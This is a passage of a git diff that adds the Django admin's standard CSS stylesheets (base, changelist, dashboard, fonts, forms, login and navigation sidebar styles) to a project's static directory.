pre { + font-family: "Bitstream Vera Sans Mono", Monaco, "Courier New", Courier, monospace; + color: #666; + font-size: 12px; + overflow-x: auto; +} + +pre.literal-block { + margin: 10px; + background: #eee; + padding: 6px 8px; +} + +code strong { + color: #930; +} + +hr { + clear: both; + color: #eee; + background-color: #eee; + height: 1px; + border: none; + margin: 0; + padding: 0; + font-size: 1px; + line-height: 1px; +} + +/* TEXT STYLES & MODIFIERS */ + +.small { + font-size: 11px; +} + +.mini { + font-size: 10px; +} + +.help, p.help, form p.help, div.help, form div.help, div.help li { + font-size: 11px; + color: #999; +} + +div.help ul { + margin-bottom: 0; +} + +.help-tooltip { + cursor: help; +} + +p img, h1 img, h2 img, h3 img, h4 img, td img { + vertical-align: middle; +} + +.quiet, a.quiet:link, a.quiet:visited { + color: #999; + font-weight: normal; +} + +.clear { + clear: both; +} + +.nowrap { + white-space: nowrap; +} + +/* TABLES */ + +table { + border-collapse: collapse; + border-color: #ccc; +} + +td, th { + font-size: 13px; + line-height: 16px; + border-bottom: 1px solid #eee; + vertical-align: top; + padding: 8px; + font-family: "Roboto", "Lucida Grande", Verdana, Arial, sans-serif; +} + +th { + font-weight: 600; + text-align: left; +} + +thead th, +tfoot td { + color: #666; + padding: 5px 10px; + font-size: 11px; + background: #fff; + border: none; + border-top: 1px solid #eee; + border-bottom: 1px solid #eee; +} + +tfoot td { + border-bottom: none; + border-top: 1px solid #eee; +} + +thead th.required { + color: #000; +} + +tr.alt { + background: #f6f6f6; +} + +tr:nth-child(odd), .row-form-errors { + background: #fff; +} + +tr:nth-child(even), +tr:nth-child(even) .errorlist, +tr:nth-child(odd) + .row-form-errors, +tr:nth-child(odd) + .row-form-errors .errorlist { + background: #f9f9f9; +} + +/* SORTABLE TABLES */ + +thead th { + padding: 5px 10px; + line-height: normal; + text-transform: uppercase; + background: #f6f6f6; +} + +thead th a:link, thead th a:visited { + color: #666; +} + +thead th.sorted { + background: #eee; +} + +thead th.sorted .text { + padding-right: 42px; +} + +table thead th .text span { + padding: 8px 10px; + display: block; +} + +table thead th .text a { + display: block; + cursor: pointer; + padding: 8px 10px; +} + +table thead th .text a:focus, table thead th .text a:hover { + background: #eee; +} + +thead th.sorted a.sortremove { + visibility: hidden; +} + +table thead th.sorted:hover a.sortremove { + visibility: visible; +} + +table thead th.sorted .sortoptions { + display: block; + padding: 9px 5px 0 5px; + float: right; + text-align: right; +} + +table thead th.sorted .sortpriority { + font-size: .8em; + min-width: 12px; + text-align: center; + vertical-align: 3px; + margin-left: 2px; + margin-right: 2px; +} + +table thead th.sorted .sortoptions a { + position: relative; + width: 14px; + height: 14px; + display: inline-block; + background: url(../img/sorting-icons.svg) 0 0 no-repeat; + background-size: 14px auto; +} + +table thead th.sorted .sortoptions a.sortremove { + background-position: 0 0; +} + +table thead th.sorted .sortoptions a.sortremove:after { + content: '\\'; + position: absolute; + top: -6px; + left: 3px; + font-weight: 200; + font-size: 18px; + color: #999; +} + +table thead th.sorted .sortoptions a.sortremove:focus:after, +table thead th.sorted .sortoptions a.sortremove:hover:after { + color: #447e9b; +} + +table thead th.sorted .sortoptions a.sortremove:focus, +table thead th.sorted .sortoptions a.sortremove:hover { + background-position: 0 -14px; +} + +table thead th.sorted .sortoptions a.ascending { + background-position: 0 -28px; +} + +table thead th.sorted .sortoptions a.ascending:focus, +table thead th.sorted .sortoptions a.ascending:hover { + background-position: 0 -42px; +} + +table thead th.sorted .sortoptions a.descending { + top: 1px; + background-position: 0 -56px; +} + +table thead th.sorted .sortoptions a.descending:focus, +table thead th.sorted .sortoptions a.descending:hover { + background-position: 0 -70px; +} + +/* FORM DEFAULTS */ + +input, textarea, select, .form-row p, form .button { + margin: 2px 0; + padding: 2px 3px; + vertical-align: middle; + font-family: "Roboto", "Lucida Grande", Verdana, Arial, sans-serif; + font-weight: normal; + font-size: 13px; +} +.form-row div.help { + padding: 2px 3px; +} + +textarea { + vertical-align: top; +} + +input[type=text], input[type=password], input[type=email], input[type=url], +input[type=number], input[type=tel], textarea, select, .vTextField { + border: 1px solid #ccc; + border-radius: 4px; + padding: 5px 6px; + margin-top: 0; +} + +input[type=text]:focus, input[type=password]:focus, input[type=email]:focus, +input[type=url]:focus, input[type=number]:focus, input[type=tel]:focus, +textarea:focus, select:focus, .vTextField:focus { + border-color: #999; +} + +select { + height: 30px; +} + +select[multiple] { + /* Allow HTML size attribute to override the height in the rule above. */ + height: auto; + min-height: 150px; +} + +/* FORM BUTTONS */ + +.button, input[type=submit], input[type=button], .submit-row input, a.button { + background: #79aec8; + padding: 10px 15px; + border: none; + border-radius: 4px; + color: #fff; + cursor: pointer; +} + +a.button { + padding: 4px 5px; +} + +.button:active, input[type=submit]:active, input[type=button]:active, +.button:focus, input[type=submit]:focus, input[type=button]:focus, +.button:hover, input[type=submit]:hover, input[type=button]:hover { + background: #609ab6; +} + +.button[disabled], input[type=submit][disabled], input[type=button][disabled] { + opacity: 0.4; +} + +.button.default, input[type=submit].default, .submit-row input.default { + float: right; + border: none; + font-weight: 400; + background: #417690; +} + +.button.default:active, input[type=submit].default:active, +.button.default:focus, input[type=submit].default:focus, +.button.default:hover, input[type=submit].default:hover { + background: #205067; +} + +.button[disabled].default, +input[type=submit][disabled].default, +input[type=button][disabled].default { + opacity: 0.4; +} + + +/* MODULES */ + +.module { + border: none; + margin-bottom: 30px; + background: #fff; +} + +.module p, .module ul, .module h3, .module h4, .module dl, .module pre { + padding-left: 10px; + padding-right: 10px; +} + +.module blockquote { + margin-left: 12px; +} + +.module ul, .module ol { + margin-left: 1.5em; +} + +.module h3 { + margin-top: .6em; +} + +.module h2, .module caption, .inline-group h2 { + margin: 0; + padding: 8px; + font-weight: 400; + font-size: 13px; + text-align: left; + background: #79aec8; + color: #fff; +} + +.module caption, +.inline-group h2 { + font-size: 12px; + letter-spacing: 0.5px; + text-transform: uppercase; +} + +.module table { + border-collapse: collapse; +} + +/* MESSAGES & ERRORS */ + +ul.messagelist { + padding: 0; + margin: 0; +} + +ul.messagelist li { + display: block; + font-weight: 400; + font-size: 13px; + padding: 10px 10px 10px 65px; + margin: 0 0 10px 0; + background: #dfd url(../img/icon-yes.svg) 40px 12px no-repeat; + background-size: 16px auto; + color: #333; +} + +ul.messagelist li.warning { + background: #ffc url(../img/icon-alert.svg) 40px 14px no-repeat; + background-size: 14px auto; +} + +ul.messagelist li.error { + background: #ffefef url(../img/icon-no.svg) 40px 12px no-repeat; + background-size: 16px auto; +} + +.errornote { + font-size: 14px; + font-weight: 700; + display: block; + padding: 10px 12px; + margin: 0 0 10px 0; + color: #ba2121; + border: 1px solid #ba2121; + border-radius: 4px; + background-color: #fff; + background-position: 5px 12px; +} + +ul.errorlist { + margin: 0 0 4px; + padding: 0; + color: #ba2121; + background: #fff; +} + +ul.errorlist li { + font-size: 13px; + display: block; + margin-bottom: 4px; +} + +ul.errorlist li:first-child { + margin-top: 0; +} + +ul.errorlist li a { + color: inherit; + text-decoration: underline; +} + +td ul.errorlist { + margin: 0; + padding: 0; +} + +td ul.errorlist li { + margin: 0; +} + +.form-row.errors { + margin: 0; + border: none; + border-bottom: 1px solid #eee; + background: none; +} + +.form-row.errors ul.errorlist li { + padding-left: 0; +} + +.errors input, .errors select, .errors textarea, +td ul.errorlist + input, td ul.errorlist + select, td ul.errorlist + textarea { + border: 1px solid #ba2121; +} + +.description { + font-size: 12px; + padding: 5px 0 0 12px; +} + +/* BREADCRUMBS */ + +div.breadcrumbs { + background: #79aec8; + padding: 10px 40px; + border: none; + font-size: 14px; + color: #c4dce8; + text-align: left; +} + +div.breadcrumbs a { + color: #fff; +} + +div.breadcrumbs a:focus, div.breadcrumbs a:hover { + color: #c4dce8; +} + +/* ACTION ICONS */ + +.viewlink, .inlineviewlink { + padding-left: 16px; + background: url(../img/icon-viewlink.svg) 0 1px no-repeat; +} + +.addlink { + padding-left: 16px; + background: url(../img/icon-addlink.svg) 0 1px no-repeat; +} + +.changelink, .inlinechangelink { + padding-left: 16px; + background: url(../img/icon-changelink.svg) 0 1px no-repeat; +} + +.deletelink { + padding-left: 16px; + background: url(../img/icon-deletelink.svg) 0 1px no-repeat; +} + +a.deletelink:link, a.deletelink:visited { + color: #CC3434; +} + +a.deletelink:focus, a.deletelink:hover { + color: #993333; + text-decoration: none; +} + +/* OBJECT TOOLS */ + +.object-tools { + font-size: 10px; + font-weight: bold; + padding-left: 0; + float: right; + position: relative; + margin-top: -48px; +} + +.form-row .object-tools { + margin-top: 5px; + margin-bottom: 5px; + float: none; + height: 2em; + padding-left: 3.5em; +} + +.object-tools li { + display: block; + float: left; + margin-left: 5px; + height: 16px; +} + +.object-tools a { + border-radius: 15px; +} + +.object-tools a:link, .object-tools a:visited { + display: block; + float: left; + padding: 3px 12px; + background: #999; + font-weight: 400; + font-size: 11px; + text-transform: uppercase; + letter-spacing: 0.5px; + color: #fff; +} + +.object-tools a:focus, .object-tools a:hover { + background-color: #417690; +} + +.object-tools a:focus{ + text-decoration: none; +} + +.object-tools a.viewsitelink, .object-tools a.golink,.object-tools a.addlink { + background-repeat: no-repeat; + background-position: right 7px center; + padding-right: 26px; +} + +.object-tools a.viewsitelink, .object-tools a.golink { + background-image: url(../img/tooltag-arrowright.svg); +} + +.object-tools a.addlink { + background-image: url(../img/tooltag-add.svg); +} + +/* OBJECT HISTORY */ + +table#change-history { + width: 100%; +} + +table#change-history tbody th { + width: 16em; +} + +/* PAGE STRUCTURE */ + +#container { + position: relative; + width: 100%; + min-width: 980px; + padding: 0; + display: flex; + flex-direction: column; + height: 100%; +} + +#container > div { + flex-shrink: 0; +} + +#container > .main { + display: flex; + flex: 1 0 auto; +} + +.main > .content { + flex: 1 0; + max-width: 100%; +} + +#content { + padding: 20px 40px; +} + +.dashboard #content { + width: 600px; +} + +#content-main { + float: left; + width: 100%; +} + +#content-related { + float: right; + width: 260px; + position: relative; + margin-right: -300px; +} + +#footer { + clear: both; + padding: 10px; +} + +/* COLUMN TYPES */ + +.colMS { + margin-right: 300px; +} + +.colSM { + margin-left: 300px; +} + +.colSM #content-related { + float: left; + margin-right: 0; + margin-left: -300px; +} + +.colSM #content-main { + float: right; +} + +.popup .colM { + width: auto; +} + +/* HEADER */ + +#header { + width: auto; + height: auto; + display: flex; + justify-content: space-between; + align-items: center; + padding: 10px 40px; + background: #417690; + color: #ffc; + overflow: hidden; +} + +#header a:link, #header a:visited { + color: #fff; +} + +#header a:focus , #header a:hover { + text-decoration: underline; +} + +#branding { + float: left; +} + +#branding h1 { + padding: 0; + margin: 0 20px 0 0; + font-weight: 300; + font-size: 24px; + color: #f5dd5d; +} + +#branding h1, #branding h1 a:link, #branding h1 a:visited { + color: #f5dd5d; +} + +#branding h2 { + padding: 0 10px; + font-size: 14px; + margin: -8px 0 8px 0; + font-weight: normal; + color: #ffc; +} + +#branding a:hover { + text-decoration: none; +} + +#user-tools { + float: right; + padding: 0; + margin: 0 0 0 20px; + font-weight: 300; + font-size: 11px; + letter-spacing: 0.5px; + text-transform: uppercase; + text-align: right; +} + +#user-tools a { + border-bottom: 1px solid rgba(255, 255, 255, 0.25); +} + +#user-tools a:focus, #user-tools a:hover { + text-decoration: none; + border-bottom-color: #79aec8; + color: #79aec8; +} + +/* SIDEBAR */ + +#content-related { + background: #f8f8f8; +} + +#content-related .module { + background: none; +} + +#content-related h3 { + font-size: 14px; + color: #666; + padding: 0 16px; + margin: 0 0 16px; +} + +#content-related h4 { + font-size: 13px; +} + +#content-related p { + padding-left: 16px; + padding-right: 16px; +} + +#content-related .actionlist { + padding: 0; + margin: 16px; +} + +#content-related .actionlist li { + line-height: 1.2; + margin-bottom: 10px; + padding-left: 18px; +} + +#content-related .module h2 { + background: none; + padding: 16px; + margin-bottom: 16px; + border-bottom: 1px solid #eaeaea; + font-size: 18px; + color: #333; +} + +.delete-confirmation form input[type="submit"] { + background: #ba2121; + border-radius: 4px; + padding: 10px 15px; + color: #fff; +} + +.delete-confirmation form input[type="submit"]:active, +.delete-confirmation form input[type="submit"]:focus, +.delete-confirmation form input[type="submit"]:hover { + background: #a41515; +} + +.delete-confirmation form .cancel-link { + display: inline-block; + vertical-align: middle; + height: 15px; + line-height: 15px; + background: #ddd; + border-radius: 4px; + padding: 10px 15px; + color: #333; + margin: 0 0 0 10px; +} + +.delete-confirmation form .cancel-link:active, +.delete-confirmation form .cancel-link:focus, +.delete-confirmation form .cancel-link:hover { + background: #ccc; +} + +/* POPUP */ +.popup #content { + padding: 20px; +} + +.popup #container { + min-width: 0; +} + +.popup #header { + padding: 10px 20px; +} diff --git a/master/static/admin/css/changelists.css b/master/static/admin/css/changelists.css new file mode 100644 index 0000000..7b8b9c7 --- /dev/null +++ b/master/static/admin/css/changelists.css @@ -0,0 +1,354 @@ +/* CHANGELISTS */ + +#changelist { + display: flex; + align-items: flex-start; + justify-content: space-between; +} + +#changelist .changelist-form-container { + flex: 1 1 auto; + min-width: 0; +} + +#changelist table { + width: 100%; +} + +.change-list .hiddenfields { display:none; } + +.change-list .filtered table { + border-right: none; +} + +.change-list .filtered { + min-height: 400px; +} + +.change-list .filtered .results, .change-list .filtered .paginator, +.filtered #toolbar, .filtered div.xfull { + width: auto; +} + +.change-list .filtered table tbody th { + padding-right: 1em; +} + +#changelist-form .results { + overflow-x: auto; + width: 100%; +} + +#changelist .toplinks { + border-bottom: 1px solid #ddd; +} + +#changelist .paginator { + color: #666; + border-bottom: 1px solid #eee; + background: #fff; + overflow: hidden; +} + +/* CHANGELIST TABLES */ + +#changelist table thead th { + padding: 0; + white-space: nowrap; + vertical-align: middle; +} + +#changelist table thead th.action-checkbox-column { + width: 1.5em; + text-align: center; +} + +#changelist table tbody td.action-checkbox { + text-align: center; +} + +#changelist table tfoot { + color: #666; +} + +/* TOOLBAR */ + +#toolbar { + padding: 8px 10px; + margin-bottom: 15px; + border-top: 1px solid #eee; + border-bottom: 1px solid #eee; + background: #f8f8f8; + color: #666; +} + +#toolbar form input { + border-radius: 4px; + font-size: 14px; + padding: 5px; + color: #333; +} + +#toolbar #searchbar { + height: 19px; + border: 1px solid #ccc; + padding: 2px 5px; + margin: 0; + vertical-align: top; + font-size: 13px; + max-width: 100%; +} + +#toolbar #searchbar:focus { + border-color: #999; +} + +#toolbar form input[type="submit"] { + border: 1px solid #ccc; + font-size: 13px; + padding: 4px 8px; + margin: 0; + vertical-align: middle; + background: #fff; + box-shadow: 0 -15px 20px -10px rgba(0, 0, 0, 0.15) inset; + cursor: pointer; + color: #333; +} + +#toolbar form input[type="submit"]:focus, +#toolbar form input[type="submit"]:hover { + border-color: #999; +} + +#changelist-search img { + vertical-align: middle; + margin-right: 4px; +} + +/* FILTER COLUMN */ + +#changelist-filter { + order: 1; + width: 240px; + background: #f8f8f8; + border-left: none; + margin: 0 0 0 30px; +} + +#changelist-filter h2 { + font-size: 14px; + text-transform: uppercase; + letter-spacing: 0.5px; + padding: 5px 15px; + margin-bottom: 12px; + border-bottom: none; +} + +#changelist-filter h3 { + font-weight: 400; + font-size: 14px; + padding: 0 15px; + margin-bottom: 10px; +} + +#changelist-filter ul { + margin: 5px 0; + padding: 0 15px 15px; + border-bottom: 1px solid #eaeaea; +} + +#changelist-filter ul:last-child { + border-bottom: none; +} + +#changelist-filter li { + list-style-type: none; + margin-left: 0; + padding-left: 0; +} + +#changelist-filter a { + display: block; + color: #999; + text-overflow: ellipsis; + overflow-x: hidden; +} + +#changelist-filter li.selected { + border-left: 5px solid #eaeaea; + padding-left: 10px; + margin-left: -15px; +} + +#changelist-filter li.selected a { + color: #5b80b2; +} + +#changelist-filter a:focus, #changelist-filter a:hover, +#changelist-filter li.selected a:focus, +#changelist-filter li.selected a:hover { + color: #036; +} + +#changelist-filter #changelist-filter-clear a { + font-size: 13px; + padding-bottom: 10px; + border-bottom: 1px solid #eaeaea; +} + +/* DATE DRILLDOWN */ + +.change-list ul.toplinks { + display: block; + float: left; + padding: 0; + margin: 0; + width: 100%; +} + +.change-list ul.toplinks li { + padding: 3px 6px; + font-weight: bold; + list-style-type: none; + display: inline-block; +} + +.change-list ul.toplinks .date-back a { + color: #999; +} + +.change-list ul.toplinks .date-back a:focus, +.change-list ul.toplinks .date-back a:hover { + color: #036; +} + +/* PAGINATOR */ + +.paginator { + font-size: 13px; + padding-top: 10px; + padding-bottom: 10px; + line-height: 22px; + margin: 0; + border-top: 1px solid #ddd; + width: 100%; +} + +.paginator a:link, .paginator a:visited { + padding: 2px 6px; + background: #79aec8; + text-decoration: none; + color: #fff; +} + +.paginator a.showall { + border: none; + background: none; + color: #5b80b2; +} + +.paginator a.showall:focus, .paginator a.showall:hover { + background: none; + color: #036; +} + +.paginator .end { + margin-right: 6px; +} + +.paginator .this-page { + padding: 2px 6px; + font-weight: bold; + font-size: 13px; + vertical-align: top; +} + +.paginator a:focus, .paginator a:hover { + color: white; + background: #036; +} + +/* ACTIONS */ + +.filtered .actions { + border-right: none; +} + +#changelist table input { + margin: 0; + vertical-align: baseline; +} + +#changelist table tbody tr.selected { + background-color: #FFFFCC; +} + +#changelist .actions { + padding: 10px; + background: #fff; + border-top: none; + border-bottom: none; + line-height: 24px; + color: #999; + width: 100%; +} + +#changelist .actions.selected { + background: #fffccf; + border-top: 1px solid #fffee8; + border-bottom: 1px solid #edecd6; +} + +#changelist .actions span.all, +#changelist .actions span.action-counter, +#changelist .actions span.clear, +#changelist .actions span.question { + font-size: 13px; + margin: 0 0.5em; + display: none; +} + +#changelist .actions:last-child { + border-bottom: none; +} + +#changelist .actions select { + vertical-align: top; + height: 24px; + background: none; + color: #000; + border: 1px solid #ccc; + border-radius: 4px; + font-size: 14px; + padding: 0 0 0 4px; + margin: 0; + margin-left: 10px; +} + +#changelist .actions select:focus { + border-color: #999; +} + +#changelist .actions label { + display: inline-block; + vertical-align: middle; + font-size: 13px; +} + +#changelist .actions .button { + font-size: 13px; + border: 1px solid #ccc; + border-radius: 4px; + background: #fff; + box-shadow: 0 -15px 20px -10px rgba(0, 0, 0, 0.15) inset; + cursor: pointer; + height: 24px; + line-height: 1; + padding: 4px 8px; + margin: 0; + color: #333; +} + +#changelist .actions .button:focus, #changelist .actions .button:hover { + border-color: #999; +} diff --git a/master/static/admin/css/dashboard.css b/master/static/admin/css/dashboard.css new file mode 100644 index 0000000..91d6efd --- /dev/null +++ b/master/static/admin/css/dashboard.css @@ -0,0 +1,26 @@ +/* DASHBOARD */ + +.dashboard .module table th { + width: 100%; +} + +.dashboard .module table td { + white-space: nowrap; +} + +.dashboard .module table td a { + display: block; + padding-right: .6em; +} + +/* RECENT ACTIONS MODULE */ + +.module ul.actionlist { + margin-left: 0; +} + +ul.actionlist li { + list-style-type: none; + overflow: hidden; + text-overflow: ellipsis; +} diff --git a/master/static/admin/css/fonts.css b/master/static/admin/css/fonts.css new file mode 100644 index 0000000..c837e01 --- /dev/null +++ b/master/static/admin/css/fonts.css @@ -0,0 +1,20 @@ +@font-face { + font-family: 'Roboto'; + src: url('../fonts/Roboto-Bold-webfont.woff'); + font-weight: 700; + font-style: normal; +} + +@font-face { + font-family: 'Roboto'; + src: url('../fonts/Roboto-Regular-webfont.woff'); + font-weight: 400; + font-style: normal; +} + +@font-face { + font-family: 'Roboto'; + src: url('../fonts/Roboto-Light-webfont.woff'); + font-weight: 300; + font-style: normal; +} diff --git a/master/static/admin/css/forms.css b/master/static/admin/css/forms.css new file mode 100644 index 0000000..89d5748 --- /dev/null +++ b/master/static/admin/css/forms.css @@ -0,0 +1,527 @@ +@import url('widgets.css'); + +/* FORM ROWS */ + +.form-row { + overflow: hidden; + padding: 10px; + font-size: 13px; + border-bottom: 1px solid #eee; +} + +.form-row img, .form-row input { + vertical-align: middle; +} + +.form-row label input[type="checkbox"] { + margin-top: 0; + vertical-align: 0; +} + +form .form-row p { + padding-left: 0; +} + +.hidden { + display: none; +} + +/* FORM LABELS */ + +label { + font-weight: normal; + color: #666; + font-size: 13px; +} + +.required label, label.required { + font-weight: bold; + color: #333; +} + +/* RADIO BUTTONS */ + +form ul.radiolist li { + list-style-type: none; +} + +form ul.radiolist label { + float: none; + display: inline; +} + +form ul.radiolist input[type="radio"] { + margin: -2px 4px 0 0; + padding: 0; +} + +form ul.inline { + margin-left: 0; + padding: 0; +} + +form ul.inline li { + float: left; + padding-right: 7px; +} + +/* ALIGNED FIELDSETS */ + +.aligned label { + display: block; + padding: 4px 10px 0 0; + float: left; + width: 160px; + word-wrap: break-word; + line-height: 1; +} + +.aligned label:not(.vCheckboxLabel):after { + content: ''; + display: inline-block; + vertical-align: middle; + height: 26px; +} + +.aligned label + p, .aligned label + div.help, .aligned label + div.readonly { + padding: 6px 0; + margin-top: 0; + margin-bottom: 0; + margin-left: 170px; +} + +.aligned ul label { + display: inline; + float: none; + width: auto; +} + +.aligned .form-row input { + margin-bottom: 0; +} + +.colMS .aligned .vLargeTextField, .colMS .aligned .vXMLLargeTextField { + width: 350px; +} + +form .aligned ul { + margin-left: 160px; + padding-left: 10px; +} + +form .aligned ul.radiolist { + display: inline-block; + margin: 0; + padding: 0; +} + +form .aligned p.help, +form .aligned div.help { + clear: left; + margin-top: 0; + margin-left: 160px; + padding-left: 10px; +} + +form .aligned label + p.help, +form .aligned label + div.help { + margin-left: 0; + padding-left: 0; +} + +form .aligned p.help:last-child, +form .aligned div.help:last-child { + margin-bottom: 0; + padding-bottom: 0; +} + +form .aligned input + p.help, +form .aligned textarea + p.help, +form .aligned select + p.help, +form .aligned input + div.help, +form .aligned textarea + div.help, +form .aligned select + div.help { + margin-left: 160px; + padding-left: 10px; +} + +form .aligned ul li { + list-style: none; +} + +form .aligned table p { + margin-left: 0; + padding-left: 0; +} + +.aligned .vCheckboxLabel { + float: none; + width: auto; + display: inline-block; + vertical-align: -3px; + padding: 0 0 5px 5px; +} + +.aligned .vCheckboxLabel + p.help, +.aligned .vCheckboxLabel + div.help { + margin-top: -4px; +} + +.colM .aligned .vLargeTextField, .colM .aligned .vXMLLargeTextField { + width: 610px; +} + +.checkbox-row p.help, +.checkbox-row div.help { + margin-left: 0; + padding-left: 0; +} + +fieldset .fieldBox { + float: left; + margin-right: 20px; +} + +/* WIDE FIELDSETS */ + +.wide label { + width: 200px; +} + +form .wide p, +form .wide input + p.help, +form .wide input + div.help { + margin-left: 200px; +} + +form .wide p.help, +form .wide div.help { + padding-left: 38px; +} + +form div.help ul { + padding-left: 0; + margin-left: 0; +} + +.colM fieldset.wide .vLargeTextField, .colM fieldset.wide .vXMLLargeTextField { + width: 450px; +} + +/* COLLAPSED FIELDSETS */ + +fieldset.collapsed * { + display: none; +} + +fieldset.collapsed h2, fieldset.collapsed { + display: block; +} + +fieldset.collapsed { + border: 1px solid #eee; + border-radius: 4px; + overflow: hidden; +} + +fieldset.collapsed h2 { + background: #f8f8f8; + color: #666; +} + +fieldset .collapse-toggle { + color: #fff; +} + +fieldset.collapsed .collapse-toggle { + background: transparent; + display: inline; + color: #447e9b; +} + +/* MONOSPACE TEXTAREAS */ + +fieldset.monospace textarea { + font-family: "Bitstream Vera Sans Mono", Monaco, "Courier New", Courier, monospace; +} + +/* SUBMIT ROW */ + +.submit-row { + padding: 12px 14px; + margin: 0 0 20px; + background: #f8f8f8; + border: 1px solid #eee; + border-radius: 4px; + text-align: right; + overflow: hidden; +} + +body.popup .submit-row { + overflow: auto; +} + +.submit-row input { + height: 35px; + line-height: 15px; + margin: 0 0 0 5px; +} + +.submit-row input.default { + margin: 0 0 0 8px; + text-transform: uppercase; +} + +.submit-row p { + margin: 0.3em; +} + +.submit-row p.deletelink-box { + float: left; + margin: 0; +} + +.submit-row a.deletelink { + display: block; + background: #ba2121; + border-radius: 4px; + padding: 10px 15px; + height: 15px; + line-height: 15px; + color: #fff; +} + +.submit-row a.closelink { + display: inline-block; + background: #bbbbbb; + border-radius: 4px; + padding: 10px 15px; + height: 15px; + line-height: 15px; + margin: 0 0 0 5px; + color: #fff; +} + +.submit-row a.deletelink:focus, +.submit-row a.deletelink:hover, +.submit-row a.deletelink:active { + background: #a41515; +} + +.submit-row a.closelink:focus, +.submit-row a.closelink:hover, +.submit-row a.closelink:active { + background: #aaaaaa; +} + +/* CUSTOM FORM FIELDS */ + +.vSelectMultipleField { + vertical-align: top; +} + +.vCheckboxField { + border: none; +} + +.vDateField, .vTimeField { + margin-right: 2px; + margin-bottom: 4px; +} + +.vDateField { + min-width: 6.85em; +} + +.vTimeField { + min-width: 4.7em; +} + +.vURLField { + width: 30em; +} + +.vLargeTextField, .vXMLLargeTextField { + width: 48em; +} + +.flatpages-flatpage #id_content { + height: 40.2em; +} + +.module table .vPositiveSmallIntegerField { + width: 2.2em; +} + +.vTextField, .vUUIDField { + width: 20em; +} + +.vIntegerField { + width: 5em; +} + +.vBigIntegerField { + width: 10em; +} + +.vForeignKeyRawIdAdminField { + width: 5em; +} + +/* INLINES */ + +.inline-group { + padding: 0; + margin: 0 0 30px; +} + +.inline-group thead th { + padding: 8px 10px; +} + +.inline-group .aligned label { + width: 160px; +} + +.inline-related { + position: relative; +} + +.inline-related h3 { + margin: 0; + color: #666; + padding: 5px; + font-size: 13px; + background: #f8f8f8; + border-top: 1px solid #eee; + border-bottom: 1px solid #eee; +} + +.inline-related h3 span.delete { + float: right; +} + +.inline-related h3 span.delete label { + margin-left: 2px; + font-size: 11px; +} + +.inline-related fieldset { + margin: 0; + background: #fff; + border: none; + width: 100%; +} + +.inline-related fieldset.module h3 { + margin: 0; + padding: 2px 5px 3px 5px; + font-size: 11px; + text-align: left; + font-weight: bold; + background: #bcd; + color: #fff; +} + +.inline-group .tabular fieldset.module { + border: none; +} + +.inline-related.tabular fieldset.module table { + width: 100%; + overflow-x: scroll; +} + +.last-related fieldset { + border: none; +} + +.inline-group .tabular tr.has_original td { + padding-top: 2em; +} + +.inline-group .tabular tr td.original { + padding: 2px 0 0 0; + width: 0; + _position: relative; +} + +.inline-group .tabular th.original { + width: 0px; + padding: 0; +} + +.inline-group .tabular td.original p { + position: absolute; + left: 0; + height: 1.1em; + padding: 2px 9px; + overflow: hidden; + font-size: 9px; + font-weight: bold; + color: #666; + _width: 700px; +} + +.inline-group ul.tools { + padding: 0; + margin: 0; + list-style: none; +} + +.inline-group ul.tools li { + display: inline; + padding: 0 5px; +} + +.inline-group div.add-row, +.inline-group .tabular tr.add-row td { + color: #666; + background: #f8f8f8; + padding: 8px 10px; + border-bottom: 1px solid #eee; +} + +.inline-group .tabular tr.add-row td { + padding: 8px 10px; + border-bottom: 1px solid #eee; +} + +.inline-group ul.tools a.add, +.inline-group div.add-row a, +.inline-group .tabular tr.add-row td a { + background: url(../img/icon-addlink.svg) 0 1px no-repeat; + padding-left: 16px; + font-size: 12px; +} + +.empty-form { + display: none; +} + +/* RELATED FIELD ADD ONE / LOOKUP */ + +.related-lookup { + margin-left: 5px; + display: inline-block; + vertical-align: middle; + background-repeat: no-repeat; + background-size: 14px; +} + +.related-lookup { + width: 16px; + height: 16px; + background-image: url(../img/search.svg); +} + +form .related-widget-wrapper ul { + display: inline-block; + margin-left: 0; + padding-left: 0; +} + +.clearable-file-input input { + margin-top: 0; +} diff --git a/master/static/admin/css/login.css b/master/static/admin/css/login.css new file mode 100644 index 0000000..062b36e --- /dev/null +++ b/master/static/admin/css/login.css @@ -0,0 +1,79 @@ +/* LOGIN FORM */ + +.login { + background: #f8f8f8; + height: auto; +} + +.login #header { + height: auto; + padding: 15px 16px; + justify-content: center; +} + +.login #header h1 { + font-size: 18px; +} + +.login #header h1 a { + color: #fff; +} + +.login #content { + padding: 20px 20px 0; +} + +.login #container { + background: #fff; + border: 1px solid #eaeaea; + border-radius: 4px; + overflow: hidden; + width: 28em; + min-width: 300px; + margin: 100px auto; + height: auto; +} + +.login #content-main { + width: 100%; +} + +.login .form-row { + padding: 4px 0; + float: left; + width: 100%; + border-bottom: none; +} + +.login .form-row label { + padding-right: 0.5em; + line-height: 2em; + font-size: 1em; + clear: both; + color: #333; +} + +.login .form-row #id_username, .login .form-row #id_password { + clear: both; + padding: 8px; + width: 100%; + box-sizing: border-box; +} + +.login span.help { + font-size: 10px; + display: block; +} + +.login .submit-row { + clear: both; + padding: 1em 0 0 9.4em; + margin: 0; + border: none; + background: none; + text-align: left; +} + +.login .password-reset-link { + text-align: center; +} diff --git a/master/static/admin/css/nav_sidebar.css b/master/static/admin/css/nav_sidebar.css new file mode 100644 index 0000000..784d087 --- /dev/null +++ b/master/static/admin/css/nav_sidebar.css @@ -0,0 +1,119 @@ +.sticky { + position: sticky; + top: 0; + max-height: 100vh; +} + +.toggle-nav-sidebar { + z-index: 20; + left: 0; + display: flex; + align-items: center; + justify-content: center; + flex: 0 0 23px; + width: 23px; + border-right: 1px solid #eaeaea; + background-color: #ffffff; + cursor: pointer; + font-size: 20px; + color: #447e9b; + padding: 0; +} + +[dir="rtl"] .toggle-nav-sidebar { + border-left: 1px solid #eaeaea; + border-right: 0; +} + +.toggle-nav-sidebar:hover, +.toggle-nav-sidebar:focus { + background-color: #f6f6f6; +} + +#nav-sidebar { + z-index: 15; + flex: 0 0 275px; + left: -276px; + margin-left: -276px; + border-top: 1px solid transparent; + border-right: 1px solid #eaeaea; + background-color: #ffffff; + overflow: auto; +} + +[dir="rtl"] #nav-sidebar { + border-left: 1px solid #eaeaea; + border-right: 0; + left: 0; + margin-left: 0; + right: -276px; + margin-right: -276px; +} + +.toggle-nav-sidebar::before { + content: '\00BB'; +} + +.main.shifted .toggle-nav-sidebar::before { + content: '\00AB'; +} + +.main.shifted > #nav-sidebar { + left: 24px; + margin-left: 0; +} + +[dir="rtl"] .main.shifted > #nav-sidebar { + left: 0; + right: 24px; + margin-right: 0; +} + +#nav-sidebar .module th { + width: 100%; + overflow-wrap: anywhere; +} + 